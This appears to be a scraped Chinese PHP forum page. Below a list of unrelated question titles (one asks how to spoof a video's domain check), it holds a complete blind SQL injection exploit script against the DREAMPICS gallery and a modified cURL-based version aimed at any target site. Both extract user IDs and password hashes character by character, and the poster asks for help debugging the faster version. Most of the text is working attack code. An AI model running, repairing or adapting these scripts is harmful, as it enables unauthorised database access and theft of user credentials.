解决方案 »
- 求一个算法思路。如果有类似例子提供就更谢谢了~~谢谢大牛们
- 我想嵌入一个视频 但是这个视频必须是一个特点的域名比如baidu.com才能播放 怎么写可以欺骗这个视频让这个视频以为是他的域名播放的 而实际是我的域名播放的呢
- 现有一个项目寻PHP行家做..详情请进
- 正则中的井号是啥意思?很奇怪,另外结尾的iU又是什么意思呢?
- 请问php团队开发用什么的管理软件保持同步
- pear的问题,急救啊!!!
- 在注册页,当提交后为什么会出现源码呢?
- Apache 給我這個是要我怎辦 You don't have permission to access /file://C:/php/info.php on this server.
- centos 7.0 访问phpmyadmin 显示500错误 首次解压安装
- 有php在线教学网站吗
- php初学者需要帮助啊
- Apache
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
# DREAMPICS Photo/Video Gallery Blind SQL Injection Exploit
#
# ---->>>> xoron <<<<<-----
# [email protected]
# XORON (c) 2009
#
# WARNING!: php xoron.php "http://www.xoronk1ng./[PATH]/index.php?fuseaction=gallery.viewPhotos&exhibition_id=13"
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));echo "\nPassword: ";
for ($j = 1; $j <= 32; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".$i."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>
因为上面这个百次执行的,效率非常低,速度太慢,我叫人改了一下,但是改完之后,得出的密码都变成---------------------了奇怪,谁看下?这个是修改过之后的。。<?php
function get_remote_file_siz($remoteFile)
{
$ch = curl_init($remoteFile);
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); //not necessary unless the file redirects (like the PHP example we're using here)
$data = curl_exec($ch);
curl_close($ch);
if ($data === false) {
echo 'cURL failed';
exit;
} $contentLength = 'unknown';
$status = 'unknown';
if (preg_match('/^HTTP\/1\.[01] (\d\d\d)/', $data, $matches)) {
$status = (int)$matches[1];
}
if (preg_match('/Content-Length: (\d+)/', $data, $matches)) {
$contentLength = (int)$matches[1];
}
return $contentLength;
}ini_set("max_execution_time",0);
print_r('
##############################################################################
#
#123
#
#
# : Usage :
#php file.php "http://site/123.php?fid=11"
#
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = max(1,get_remote_file_siz($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = get_remote_file_siz($url."+and+1=0--");
$t = abs((100-($w/$r*100)));
echo "id: ";
for ($i=1; $i <= 30; $i++) {
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$i.",1))!=0--");
if (abs((100-($laenge/$r*100))) > $t-1) {
$count = $i;
$i = 30;
}
}
for ($j = 1; $j < $count; $j++) {
for ($i = 46; $i <= 122; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$j.",1))%3E".$i."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+uid+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 122;
}
}
}
echo "\nPassword: ";
for ($j = 1; $j <= 32; $j++) {
for ($i = 46; $i <= 102; $i=$i+2) {
if ($i == 60) {
$i = 98;
}
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".$i."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
$laenge = get_remote_file_siz($url."+and+ascii(substring((select+password+from+users+limit+0,1),".$j.",1))%3E".($i-1)."--");
if (abs((100-($laenge/$r*100))) > $t-1) {
echo chr($i-1);
} else {
echo chr($i);
}
$i = 102;
}
}
}
}
?>